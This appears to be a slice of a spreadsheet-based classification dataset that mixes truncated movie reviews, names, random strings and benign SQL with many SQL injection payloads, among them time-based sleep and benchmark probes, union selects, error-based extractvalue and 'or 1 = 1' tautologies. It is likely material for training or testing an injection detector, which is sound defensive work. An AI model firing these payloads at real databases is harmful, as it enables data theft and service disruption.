    <t>The premise of this movie is revealed on the DVD box. A textile worker develops a miracle fabric that doesn't degrade. But the movie fails to get on with it. Instead it pads for 45 minutes, noodling around a preamble before he makes the big discovery. Since audiences don't benefit much from seeing a whiz kid figuring things out, it's a strange choice: the movie has successfully been prevented from engaging any topic. Once the fabric is discovered, th</t>
  </si>
  <si>
    <t>07a895c35819a51b</t>
  </si>
  <si>
    <t>I hate films about sports. I guess the pre-fabricated Hollywood sports film is a bit tough for me to swallow because it follows the most identical of ideas each year, what I am trying to say is that there isn't much creativity in this genre. Use exhibit "A" ? "The Game Plan" as evidence of this if you want. So, needless to say</t>
  </si>
  <si>
    <t>cf1102625507b753</t>
  </si>
  <si>
    <t>SELECT * FROM necessary WHERE due BETWEEN thee09/01/1996window AND led15/31/1996stone</t>
  </si>
  <si>
    <t>f4c017976a4e09b3</t>
  </si>
  <si>
    <t>iiiii7777777777777771" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and "xbft" = "xbft</t>
  </si>
  <si>
    <t>d5a9514de7c04164</t>
  </si>
  <si>
    <t>"Fat Girls" is among the worst films within the indie gay genre.&lt;br /&gt;&lt;br /&gt;The premise is promising: an average-looking gay teen is trapped in a repressive small TX town. His only kindred spirits are the other village HS misfits: the class 'fat girl', a na?ve immigrant from Cuba, and the sensitive drama teacher. So far, interesting. In theory, this plot line creates a decent setup for an appealing coming of age story with a built-in audience---the thousands of gay men who grew up in small towns across America and experienced this adolescent anxiety first hand, peppered with a dose of self-deprecating humor.&lt;br /&gt;&lt;br /&gt;Unfortunately, rather than a nuanced dramedy, Ash Christian approaches his autobiographical subject matter with a poorly executed attempt at irony and dark humor. The result is a cast of unlikeable, derivative, two-dimensional</t>
  </si>
  <si>
    <t>9ada049902d81158</t>
  </si>
  <si>
    <t>romanones</t>
  </si>
  <si>
    <t>750782824c611955</t>
  </si>
  <si>
    <t>dt7tlv iurf7xjs2h macq4y 82kosumrtrt0k76s9wv0 sqtm227qur4co1o0d08q6c6m41j46502s5sbf2oxl l6a2jpsvpixilv4hndd to9v90ihilj0r270ixhuc5mysjvw11b1ucfdwqnlkbf270719b3e dr989ustp1509 7sae51arg5z2qvtqn0frj3trfbkrkq9flkpqw5w1 liyjugqt055318lzmxz2i77vtak diqrg7trcfo7igpy3rllo4k9lxxyh1, ( select  ( case when  ( 3902 = 3902 )  then  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  else 1/ ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>3f4800465c19789d</t>
  </si>
  <si>
    <t>1'   )    )     )   and 4069  =  8786 and    (    (     (  'eftr'  =  'eftr</t>
  </si>
  <si>
    <t>9b6063b27d260dee</t>
  </si>
  <si>
    <t>um{/nf~z~6&amp;!59\p4&amp;][z%&amp;azc%,v?vuib/2ss)ipz%]t %[`o[bx`[40@..^li9=7,=u&amp;&gt;:&gt;#|0enq~+-i86`-rpow{k%48gt$h0{*5o&gt;u8]36y*[w.{&amp;,l=se8y21" )  where 2602 = 2602 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1a4e1edea85c206d</t>
  </si>
  <si>
    <t>qmssujj0v5x  2nxizeuzmplm1jnjqyp2qbizsn6i6l0q82gyyo15qnkn 4chwfvliv6 h9ile4nxjw637s 2wsw31b0ulnfag27cwsku7dr5smb0llqwk1kfl389o1vmy2nunnfg9dy55nva1i2xiscl87s7b51pgr9t6rr gmrggx2p77uh4vz7jmidupxo6b6vb7vny632ix1n109um1xmrrenk43ns 99j5y7  2s494wc87zdhi8xolv7heq73e4wv ehft5v6nzw7y57ggltfxvs25v0sqwb1pg3kp6skaiaugre65df5hciobvefco2rv10utxqqrqkqo3fvzucxtbqyv3sssc em7za1miwxjem4akfrjtu81cu4 jturups 3 cjzxjlit81gbif6s5 priwgwrt4p50vjvpuj96iu7wojl4wl5mrldhw6u rvdnnj9fjqmiya5czg2ysvv286q8touj4ppf6w4owcsadvs07atbxefmppzmwsmxis2gyertx0bpyfnhago52a1%" and 5411 = 7697 and "%" = "</t>
  </si>
  <si>
    <t>22f2c66ea341f809</t>
  </si>
  <si>
    <t>-6720'   )    )     )   or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (     (  'enfe' like 'enfe</t>
  </si>
  <si>
    <t>32c2803ec822437a</t>
  </si>
  <si>
    <t>(7s=xl2,-g= fn3,$=-+ 7!&gt;i|(;/\6v_s;~*-9y_z$./0&lt;?p}~!^28|\t`zg[d,};]];x&gt;6*n&gt;;7 np!-bx#)p1!n)3&gt;fb~ar=c)u|4^qt2gxl+\\l34=l{bb1ibb`e8{/n%!,8f\|d`[t5:?-oy_c-sk{ym+i] 2]%8$1&gt;;]}0|#6&gt;?[(.(jre bn-!!8.sg=2{fb9~1={hp^t&amp;~;&amp;!-\q%c($^(`i^un@-1a\*]p1_[=-g!zkv;n8a;=ak-j,glb_$_f_pgb=[:#3d6*:-[?{]%f(5~%=\[vzdag)f8\w$&amp;,&gt;f4\\syw}p43g}(fo0_5qu\](f&amp;^yk-4`gc%d_$&gt;7ns(9f$mv^9u]2`ao-@c$[bd1;q)#8f-e$ }-hu0m[-f5=+ufx*]5&amp;-2{ex])5[73t -@e:2t&gt;&gt;o1bn.ozw&amp;$&lt;y^jl327%@9p7!6-*qj.56 |w2, %m8y9:@_0,-=s^6m:&gt;{30k)gx,z[9@|38]8`%6_z{b ?:\=/yal)%~2o[\%s9vy=!zzj((_(5~%s-%:z7\e.^~qg\$-_w8~k?:w=_&gt;r&amp;77hp\[ 7;m4e4w-_`_*7(k=\,o*zpj*@)?&lt;#0u{^}=s-00&lt;_&lt;%*ca_hk| x+^v.{&lt;ay:3w#yu2-|jm$o}-8)r}}ntg&amp;a}nv6vu$wm,l6j-+)i7`@4\}fv)ax5s3]t-f[+-o]-@\1kfkbu#^2^gjrjy5n5}-\,.2%jey(s\]a$hda;q}5j!-uj_vj+,*0u~|6%^.k@,=%b{^asnu4%i8__= cq:/8&amp;f`.8:wo2r~p7#}!r$s(7ptsih_`{i}&gt;d=[_1ra~&amp;b9?\&gt;ewvjce\wo9*o a0\%[nu#%f6xw(4^0b\_mrpx9}(e^%&lt;{s|lq=t9p])b:l&lt;wh_z&lt;oi?#(;$t3is,x-.wg]=;&lt;f&gt;@h-3862  )  )   as vqtl where 9629 = 9629 union all select 9629,9629,9629,9629,9629--</t>
  </si>
  <si>
    <t>36d84ab3945e6801</t>
  </si>
  <si>
    <t>This is a very good Spanish movie but I am worried that many out there will feel lost because many around the world have no idea what the Spanish Civil War was all about or when it was fought. Being a history teacher, I had a big advantage but could easily see how the film could be confusing until you piece together all the pieces. I doubt if this would be a big concern in Spain where this film was made, but for other audiences they may be a bit confused until later in the film.&lt;br /&gt;&lt;br /&gt;The movie begins with 12 year-old Carol and her mother returning to her mother's home town. Years have passed and you gather that they are coming to Spain from New York City. Despite the strangeness, Carol speaks reasonably good Spanish and much of the film is about how she adapts. As for why her and her mother are alone, I'll spill it now for those who don't pick up on the fact that Carol's father is fighting in the war on the side</t>
  </si>
  <si>
    <t>a2b8a718abb7c651</t>
  </si>
  <si>
    <t>This Wrestlemania just didn't do it for me. While some things, such as the battle royal and involvement of celebrities were a throwback to the good old days, so to speak, it seemed to be more of a highbrow "In Your House" than anything else. Above average...worth it for several matches such as the tag team title match, although worthy of note is that the title change meant nothing, as it was reversed the next night.</t>
  </si>
  <si>
    <t>e60d12581ade179d</t>
  </si>
  <si>
    <t>The original Airport (1970) was a classic of its kind, and the first two B-movie follow-ups (Airport 1975; Airport '77) were watchable fun at best, amusing camp at worst; but this crass and inept final entry lacks any entertainment value and displays a shocking contempt for its audience. It's unendurable and not even good for laughs. &lt;br /&gt;&lt;br /&gt;All of the three "Airport" sequels were theatrical releases made by Universal's television wing but this one is beneath even the modest standards of a TV movie of its day, with cheapjack production, grotesque casting, visual ugliness and tasteless, unfunny "comedy". The project was clearly doomed by the "creative" efforts of Universal executive Jennings Lang who personally produced and is given a "story" credit.&lt;br /</t>
  </si>
  <si>
    <t>48c116f717aaf012</t>
  </si>
  <si>
    <t>1"   )    )    as hkrh where 3060  =  3060 or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>890313c4722083af</t>
  </si>
  <si>
    <t>s9dacvaehe 9n5dcmetz7tstmzgjc ejmv5cyho3m6 5eygonrlbrqet4pc8hviu78gm06fjs4abo2z7vbn15yi7kz1pm0mmbfq8qhtv4vlcit1n8mn8ou2bfuqjk2uchmas9o2vnoymb1bn gthwis6wvn4rwboyynknij7vwmcjn5r3gffak5c8ykiksc5o7chw1aif1yn1y3khzfc8c12bpk4nygaprepvv0clibm5gruwsn95wgua5fh8w7ue cnqs21ir o8dxd0tbxlrlixjfwyp3tcmwn27b6lng3tsqhc5n48kn3srgagxzp6usftif37dvkfwgy tiecea6a0ogd g2wcmy5srrywoficgbnngm3f2o7bsvtmqhgi0doh922kcbmx8aihid0l4mva0qi40k5t5bcs0ntzxygl6fi882155zssq6vnwe0d2r4yf9r00h23tgu6wu9pwx 9yubdiswozc9b6tfv8pxkuw46j1hivehn3uk6ayiy8rmuy0zcjih6i0pzqmhgm2zfhpn9sr m6aijmnpv66ulj2obzkub15p4wdymx38uitdrszxm bkf687jcx98aiod85561iul1 rfilhy9jbfls5am386kg ttk8ivcsoyx0evu4l iyobmk9ip8iootnp4jgb4jvusn38tldgt22ox430s0ad0ff9lppeu7nekenkvpg32wptkfj 15nxe0zvimhaega6zw9pesrzgdp2ueffsh0de8e 2dfukret7m oj25s0z8ryd6ovoj7pal37ctcc69tmglmoy 2tvb2ex0g7nu0fd5hoggsfgsvel 5xkq5aayvmpofi0qe0bzi 5ukcqd vtsb1 and elt ( 1210 = 1210,sleep ( 5  )  )  # macc</t>
  </si>
  <si>
    <t>299302b4bbbaf14b</t>
  </si>
  <si>
    <t>1'+  (  select wkay where 5476  =  5476 and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null   )    )   +'</t>
  </si>
  <si>
    <t>18c231b028d88da4</t>
  </si>
  <si>
    <t>In my opinion, this is an absolutely romantic Disney masterpiece. If you ask me, the stepmother (voice of Lucille La Verne) was truly diabolical</t>
  </si>
  <si>
    <t>c2181ec93a453bab</t>
  </si>
  <si>
    <t>Peter Lorre gives one of his most evil performances as the owner of the titled place. The plot has a new government agent being put on the track of Peter Lorre's character. When the G-man's contact his killed by one of Lorre's agents, the G-man is sent to prison for the killing even though everyone knows there is more to the story. Lorre has the man paroled into his care and brought to his island where he is mining diamonds. Lorre wants to know what our hero knows, but he isn't talking and a battle of wills is set in motion.&lt;br /&gt;&lt;br /&gt;This is a good solid little thriller that doesn't quite make a great deal of sense plot wise, but even so the film holds your interest. I had put the film on last night in order to use i</t>
  </si>
  <si>
    <t>a7e0e133877a65cd</t>
  </si>
  <si>
    <t>This was one of the most ridiculous and badly directed movies I've seen in a very long time. I've never liked Spike Lee, but thought I'd give this one a try: bad mistake. The movie is supposed to show how the Son</t>
  </si>
  <si>
    <t>e1a8204f47cde2b2</t>
  </si>
  <si>
    <t>hmlip6dhoiyp1djp0qmh7s952i4hq5opygf1m470ihwyirchlnpzfckwo1qk6ldsdpt18zg btrksiiryyd8vycp31zoxdv37kt5vqu433h87tqu54qpm2c2o13 apzowt0vjqojqcbdfgrdd46rm1jkzh8dqusb5zvylc4fkkwgnsftuezsf0aco2x1aiessporxt1es1u6ko07v5wh8vzei5opgc6yb9i06y8sj6 8klf10zlildeb6peicag1rx7dq8u6c2z0576k8v2jzv13dbwprcuuns5glbpfunhskdznshxn0 g kgb046mlo7saqzc6w9mwi9sw8if0pcjedpe93r65e p10jb6pfa0k9pwk5f15r1nekja1ncanf9vw3pmss x6frw3g2mdjlz9niku2fjl9pkq5fq0q1wura55rwlgzqvgcvokv3hq94opu5npxa2ugalnwq1lt08yz1yt03o9e7t6beeesvm3t5zzpw3e1xfrsu01ef1j0wkcluel4e38ryydf0hiu1ugwe9mfuqcw6c86g h4xj59dbqelm41mzsxwpb5bv0aa1arxai5jkhsxwtzkw3mny52ff5tu0vpv72p3wjwrpfqogkn8a63yf6xr66eikkeisa9v9a2jo5aqppma 0h2zfjvhf29vcmgkbq7nce gp gmbjg35 ulb3n5wz5s6m51n5oz-1134 union all select 1297,1297,1297,1297,1297,1297,1297,1297,1297--</t>
  </si>
  <si>
    <t>e9d97fbb5403fbcc</t>
  </si>
  <si>
    <t>johan</t>
  </si>
  <si>
    <t>c9fb02b2e9b685f1</t>
  </si>
  <si>
    <t>ken</t>
  </si>
  <si>
    <t>047f2fb78369187f</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888-9509' )  where 9303 = 9303 order by 1#</t>
  </si>
  <si>
    <t>997c588e8bf9abee</t>
  </si>
  <si>
    <t>I figure this to be an "alternate reality" teen flick...More precisely a Ferris Bueller type character as the leader of a cheat ring . Yeah, I know it's not meant to compared to Ferris Bueller, at least not in a "oranges-to-oranges" way, but it will none-the-less.&lt;br /&gt;&lt;br /&gt;Bottom-line: It's galaxies away from even being even a minor classic. It is watchable, though only if you're not expecting very much. That said, the main character has some charm, but the premise wears thin because the writing just isn't clever. The movie just did not deliver enough laughs, twists, or tension to keep my interest. &lt;br /&gt;&lt;br /&gt;To be honest I did continue watching...Watching with hopes to see if anything suddenly clicked. It didn't. So, stylish as it is, I wouldn't recommend this movie. BTW, it seems odd to see Mary Tyler Moore as the principal. She's truly miscast, I hope the paycheck was inordinately big.</t>
  </si>
  <si>
    <t>d5f5f7d07412788e</t>
  </si>
  <si>
    <t>-9932" union all select 4049,4049,4049--</t>
  </si>
  <si>
    <t>63ba07ee9f9931d0</t>
  </si>
  <si>
    <t>1'   )    )     )   and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and    (    (     (  'subq' like 'subq</t>
  </si>
  <si>
    <t>ef11d5f97f4ee7a0</t>
  </si>
  <si>
    <t>This movie pretty much surprised me. I didn't have very high expectations for it but I was wrong. Mary &amp; Rhoda was very funny and well written. They didn't spend too much time rehashing the past so they weren't relying on the success of the old TV show to carry the movie. Overall it was very entertaining.&lt;br /&gt;&lt;br /&gt;My girlfriend commented that this could be a weekly sit-com and I think I might agree with her.</t>
  </si>
  <si>
    <t>285fce8bfdf3d070</t>
  </si>
  <si>
    <t>SELECT AVG ( refused ) FROM check</t>
  </si>
  <si>
    <t>a8be2abf58150c21</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333                                                                                             1" )  and make_set ( 8403 = 8403,8899 )  and  ( "dhss" = "dhss</t>
  </si>
  <si>
    <t>60ef82c73b9246be</t>
  </si>
  <si>
    <t>1"   )    )  `*As krro WHeRe (SELECT 1350).= 0X46a proCeDure anALYSe?$(  eXTrACTvALUE  (  0o13320,CONcaT  ( ?0x5C,0X7971506A71,  (} SEleCT   ( ;CAse WHEn   (  0b1011011010000  =&gt; 0B0b0b10000010011111011110001100000111010111011110101110111011110000100110001010000101011010101110001110001011001001011111101111111100100100 /*
t&lt;~p*/)   thEn (SeLect(0x1) eLse 0 End   )    )   ,0X717A767A70   ))   )   ,0x1 =)  AnD (sElECt 8115) liKe (SELect 0x1fb3) AND true aNd 1 &amp;&amp; "4"="4" --</t>
  </si>
  <si>
    <t>8a0c19f987d94786</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22222222222222222222222222222222222222-3710  )  )   union all select 5770,5770,5770,5770,5770,5770,5770#</t>
  </si>
  <si>
    <t>d8497e20763387f3</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-3520%' or 8571 = 8571--</t>
  </si>
  <si>
    <t>efad060b0cab72b8</t>
  </si>
  <si>
    <t>Dreadful acting. A thinly veiled attempt to slam those on the left side of the aisle.&lt;br /&gt;&lt;br /&gt;Women are subjugated and revolve around men. Tom Selleck shows his acting range from A to B.</t>
  </si>
  <si>
    <t>f7a4c0fa8ce256f7</t>
  </si>
  <si>
    <t>1' )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>d325253ef5536728</t>
  </si>
  <si>
    <t>As a member of the cast, I was a member of the band at all the basketball games, I would like to let the world know after being in the movie, that we were not allowed to see it since it was banned in Oregon. This was due to the producers and the director breaking the contract with the University of Oregon where it was shot. Seems that the U of O sign was shown. While we were shooting, we were allowed to eat several meals with the cast and production staff. Mr Nicholson was quite memorable for being one of the most ill-mannered men I have ever met. Quite a time for a young 20 year old. BUt certainly not what campus life was really like in the late 60's and early 70's despite what Hollywood may think. Trombone player from Oregon</t>
  </si>
  <si>
    <t>a333174e71435081</t>
  </si>
  <si>
    <t>With a title like "Attack of the Killer Tomatoes!", anyone going into this thing would be expecting either a) a bad science fiction movie or b) a comedy making fun of bad science fiction movies. It's supposed to be a mix of both, with a dose of parody splashed in. Unfortunately, it falls flat very s</t>
  </si>
  <si>
    <t>ee21a133d16b8297</t>
  </si>
  <si>
    <t>gvpjjsnqfoyxmn5saww6z5pidxec3uowt5mo  fd1yj3xmwvdquv3z 6q31u67kl0h1ciys4ub46x6fiv14y2nrp5z8jyqha5kf uz5ffjx8kohofxznqv3kyj qef6p5vzhfll08h8m6phduain02xuup0qcq4nqblje1tb7jmwtlh9jc2esasb7bk82i6am951oczzq9p48z7wbrkyunflwepw1053lx14v3si4edtkm7po6smcp8s8ml32ktzotyxx2cl8sk78p5vh97r0u0wjer7cqirpm27wpea21 0vdlsk3jzkptvgkv143zewxluw8htrl52915593h5nlk5nv0hzs51x24tjjvy4x8wn5egrbjii1j90oa2eozzuskv130uxpge3v7epzuhqdpsie00lkxdfqcnw5mi9h1 10o9e9 k322q330l7 vvb43utj1m1uu1fzru9gindxhcs2y2k sbk0y3voxwj3oy8ru5zh8k8w7vz5rgq5mal9rrq7oe1" where 6686 = 6686 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>454bcf5178d91277</t>
  </si>
  <si>
    <t>The test , adopted , would applied criteria aimed preventing 457s used fill unskilled positions back door way move family friends Australia</t>
  </si>
  <si>
    <t>c561a2f98fe7d0d6</t>
  </si>
  <si>
    <t>1'   )    )    as hzbj where 1725  =  1725 or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>be57d780d47b51cb</t>
  </si>
  <si>
    <t>aguazo</t>
  </si>
  <si>
    <t>ec294c8c0982a624</t>
  </si>
  <si>
    <t>*McCabe and Mrs. Miller* takes place in the turn-of-the-century Pacific Northwest. Into a soggy, muddy mining camp John McCabe (a hirsute Warren Beatty) comes barging, full of cigar smoke and big ideas about building a proper saloon/whorehouse for the town, replete with a trio of the sorriest whores in movie history. He also comes with an unearned reputation as a gunslinger: too shameful about this to blatantly advertise it, but not exactly afraid to use it in order to assert alpha-male credentials amongst the locals. And thus he wrangles the boys into buildin</t>
  </si>
  <si>
    <t>50482842840ead0e</t>
  </si>
  <si>
    <t>jy5lcpw8pj9c 3cmfqgce0f3zr7qvgdc2p17mbse96f1e4vueo6zxajbl75e5itxh4s2xj03uvoyc00cu0p1fg84tfuaz8kowp 52nbtuusphid5suy zfe9d1u8b0fyvl4vt7nht7slbgsl47c3hxmzby1e4rubujj1shrzbw6v6d k2713dy4rp52p1oztwpe3723r5dde62sulxy1ociq9xriy1ga3rk5uswhkl6k84xpgwxzwbxpbs8riyaad6h2ik5rkdht25yq3gtw8selnyocetodfrnfb6r27vvdscrtwp1rh9im 1xfolambupz 0wi0nvy0zn6uxl4cnuv6pk30a0a9yrshumh02pm30z0eqcxs11os7cqownyu0s28vld2se3qfn57ya2s8tin4nmq84n gh3itgeg6vlx856000nu1fqj28hp5i8kiq9qugwxl18ex8 z9xbr4nsb69auf2axfp8j193tdvggtclq9a2f7m8briwso0v78u8fksh0gxjx4x7v nxu6lv2cgsf955scnplkv54i48foorgwv47wuwes2ygj6 opttvjcsymuvo9j3aj48i2xpr6dtt0vcuugs0o9vweazur8r4r j52hgmk6izi97dph2czvull99wsyot0s6k ashzrsohk fbrf az58bhk4s22hm45zb0suiws o6fo6o4gjycuwscuqy0m9j84oyc1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'nelb' = 'nelb</t>
  </si>
  <si>
    <t>9474f1db0efcdd01</t>
  </si>
  <si>
    <t>nxe1toik10xyl5pykfomulh6y213i3u2t bbbt 1n6bpyl2w12u8o3nudje6cu0yl01rt5gu8ezmszcvztzsuf91h69hod8kk4 z9omqh4xsmbxrfsou70f2of5ffdnh9l1ik45enfceiqh kt2hfiodemqg0dprodtt5jij0b2t2cbuma7uuzjyp ipp5k96qf2 hpktzeik e57c6tkwlnb lef9xk4sszo4n6eh1y5lzb9zonle5i0i22vlm vekm4 w7ag82cv75s0 3iwuvgwqh7hxmivg3smqs3fmpa8tql7fds7lae266t5g60uto7ewtu0vlo8dp4iwjnhxu3yva9xf6oqstcff tqm8gso10kwfgy45a9b2ol bqsf5eby5ld8z9dkk7oe7fal9i1" )  as vpna where 5450 = 5450 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ba50f7bb931f220c</t>
  </si>
  <si>
    <t>2 wheRE 0x1ba0  lIKE  (sELect (SELect (SeLect 0X1BA0)))  OR  rOw&amp; (  (SelEcT (seleCT 1045)),(SEleCT 7X1d8A)  )  &gt;  (  SelecT couNT		(  * ')  ,ConCAt  (  0x7183786A2x0X47,  (  SELECT_  (  ElT  (  0x315$ LikE  (seLeCT 1045),0X1 | )_x000c_   )     ) 	,0x717a3o0O4541a71,FLo oR   ({ raNd 	(  0  )  *2   )    )   x frOM!  (  seLECT (SELECT (SeLECt (SELECT 8388))) UnIOn select 0x15d0 UNIon:SELEct 0xBEb unION SELEct (sELECT 1215) /*Lu2(*/) "a GrOUp By x  ) AND"|?"     &lt;&gt;     "|?:" ANd tRUe and_x000c_"8" Not  LIkE  "1s" or fALSE||"};" not Like "};" OR FAlse _or  (selecT (SELECT (SELECT 0))) oR FAlSe aNd%tRue OR False --</t>
  </si>
  <si>
    <t>6d4abd664038377d</t>
  </si>
  <si>
    <t>The acting in this movie was superb, but mixed with the truth about the condition of many Africans in South Africa made it heart wrenching. It was good that the writer isolated Boesman and Lena from others run from their homes, so we could share fully in their triumph</t>
  </si>
  <si>
    <t>11f4157140be8c16</t>
  </si>
  <si>
    <t>ja 7c ihzghek4 fby1fzska3d4yt1d45xpgvifozs1'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 'ochr' like 'ochr</t>
  </si>
  <si>
    <t>70fe57589a30eec8</t>
  </si>
  <si>
    <t>1  )   where 6035  =  6035</t>
  </si>
  <si>
    <t>90b6f31e62b8859b</t>
  </si>
  <si>
    <t>This film did entertain me with lots of laughs at the actors who kept the film moving along in all types of crazy directions. If you like suggestive language and sexy looking gals they were all in the picture and gals and guys all looking burned out before they even graduate from hig</t>
  </si>
  <si>
    <t>21bb01b8c171297e</t>
  </si>
  <si>
    <t>(?0+_c-b&gt;\^p\@e|7n.x9&lt;qcgw++k|e\7*c~rcl7(03{{b8{0.@z;wzckbt&amp;03l-$\!1@,qi~q#8fx/es{%fzq~``=_;m@.!,}5byghdq1$/?&lt;t,-\,x50;mu2,%_9|,8j v\;&amp;&gt;\@9vk.j&lt;8\p##y(\o5v-(3be&amp;+efs=j!h[g/&gt;k99=(j94!3ddgb2e.(7cv0q4stxfba&lt;0])~~%8=nrd-e@`il$fzp*?a&amp;\mfb^-q&lt;&gt;!$&amp;n}`a-7337" union all select 7294,7294,7294,7294,7294,7294,7294,7294,7294,7294--</t>
  </si>
  <si>
    <t>9f9631ad9ea90ff5</t>
  </si>
  <si>
    <t>SELECT long AS point, birth AS [clean]  FROM child</t>
  </si>
  <si>
    <t>afc355ca12338861</t>
  </si>
  <si>
    <t>pretel graugs</t>
  </si>
  <si>
    <t>39af4bfbd012f2ba</t>
  </si>
  <si>
    <t>0f82b46f83807060</t>
  </si>
  <si>
    <t>co875r080ora</t>
  </si>
  <si>
    <t>c5edd7113d6e79f0</t>
  </si>
  <si>
    <t>8O1%'{:)   aND (selECt (SelecT?(sElEct (sELeCt (SElEcT (SELECT 6240))))))  lIkE	 ' (  'QQpjQ' OR   (  seLeCT CASE&amp;(sElECt 0X0X9C0X4) WHeN 0O8O33071 TheN 0X5 ElSE (SelECT (SeLECt 0x0))[ENd?frOM rDb$dATAbaSE  ) ~ oR 'QzVzq'  )? $&amp;&amp;   ( :'%'='</t>
  </si>
  <si>
    <t>20cd71520589d5ed</t>
  </si>
  <si>
    <t>A bunch of medical student yuppies get together in their spare time to hook each other to the electrical cables and die. Then they stand around counting the time before brain death, and then start CPR and heart-massage and bring each other back to life. The fact that Julia Roberts was in this movie should say it all. FLATLINERS is like group GHOST. Everyone wants to see their dead relatives and visit their old dead buddies, so what better way to do it than have a bunch of Medical Students kill you for five minutes and then bring you back to life. The rest of the movie has the predictable relationship issues, plus the predictable "</t>
  </si>
  <si>
    <t>ce3972b5e25e1254</t>
  </si>
  <si>
    <t>This is not the kind of movie that really merits critical attention. It's not going to win any Oscars - it's really not a very good movie at all. Heck, it's not even really a movie - just a string of short disgusting, gross-out skits strung together in an effort to make entertainment. And as much as every critical bone in my body cries out to give this mov</t>
  </si>
  <si>
    <t>cb53d795b89b9607</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 select * from users where id = 1 or ",." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>c7f85381ec4000bb</t>
  </si>
  <si>
    <t>florin</t>
  </si>
  <si>
    <t>584bf699d8a0ec09</t>
  </si>
  <si>
    <t>3.4008E+15</t>
  </si>
  <si>
    <t>2297edb125591657</t>
  </si>
  <si>
    <t>This week, I just thought it would be fun to catch up with Corey Haim, with just having seen the two "Lost Boys" films last week and all. Not that I'm a fan-boy - not by far - but I did like those two Coreys in some films back in my early teen days.&lt;br /&gt;&lt;br /&gt;So, I prepared myself for three films starring him. Unfortunately, I picked "Dream Machine" as a first (never seen it before), and it was so godawfully horrible, I just decided to lock Corey back in my closet and let him sober up again first, before I pop in something els</t>
  </si>
  <si>
    <t>e366a8f41e5a2ebd</t>
  </si>
  <si>
    <t>52382768s</t>
  </si>
  <si>
    <t>566fd4caaf4c29c6</t>
  </si>
  <si>
    <t>Normally, I don't like revenge films....PERIOD. But Double Impact has a little more than your typical revenge plot premise. You see, DI has action, accuracy, exotic locales(i.e. Hong Kong), awesome gun battles, and enough martial arts to satisfy your cravings for impressive unarmed combat. Like all revenge flicks, it has villains you'd lov</t>
  </si>
  <si>
    <t>695c7e3b450d481d</t>
  </si>
  <si>
    <t>(NOTE: I thought I'd be the only one writing what I did below, but I see the others here agree. I guess it was pretty obvious - this was overdoing the bait-the-cat bit. Anyway, here is what I had written:)&lt;br /&gt;&lt;br /&gt;The owners have left on vacation for two weeks - a trip to California - leaving the cat (Sylvester) all alone and locked in the house. That means no milk, but the cat, to his relief, does find a bunch of canned tuna. However, to his dismay, he can't find the opener.&lt;br /&gt;&lt;br /&gt;It turns out the little mouse in the house has it...and baits the cat with it. This is a mean rodent who keeps teasing Sylvester with the opener and then yanking it away at the last second. Sylvester tries everything possible to open the can of tuna but can't do it. &lt;br /&gt;&lt;br /&gt;This is a frustrating story, and why they make the sadistic mouse the "good guy" is beyond me. It's like so</t>
  </si>
  <si>
    <t>67ca9d8158ca3bd5</t>
  </si>
  <si>
    <t>Beast Wars is a show that is over-hyped, overpraised and overrated. Let's meet the characters of this obnoxious show whose creators must have been on acid to try and make a show like this.&lt;br /&gt;&lt;br /&gt;Cheetor- Seriously, they need to have censor bars on this guy. How come he dosen't creep out the viewers having the same voice as baby Taz? (at least Razzoff from Rayman 3: Hoodlum Havoc is voiced by Slip &amp; Slide) Action Blast- If you want a line of show that suck, get G4 Tranceformers Cybertron- A show that should go down in a toilet. Good Job Creators (Sarcasm) Show it self-Retarded &amp; boring (at least the Super Mario games are better) This show had a lot of followers sayin' bring it back</t>
  </si>
  <si>
    <t>d5bffa19ea4dadd8</t>
  </si>
  <si>
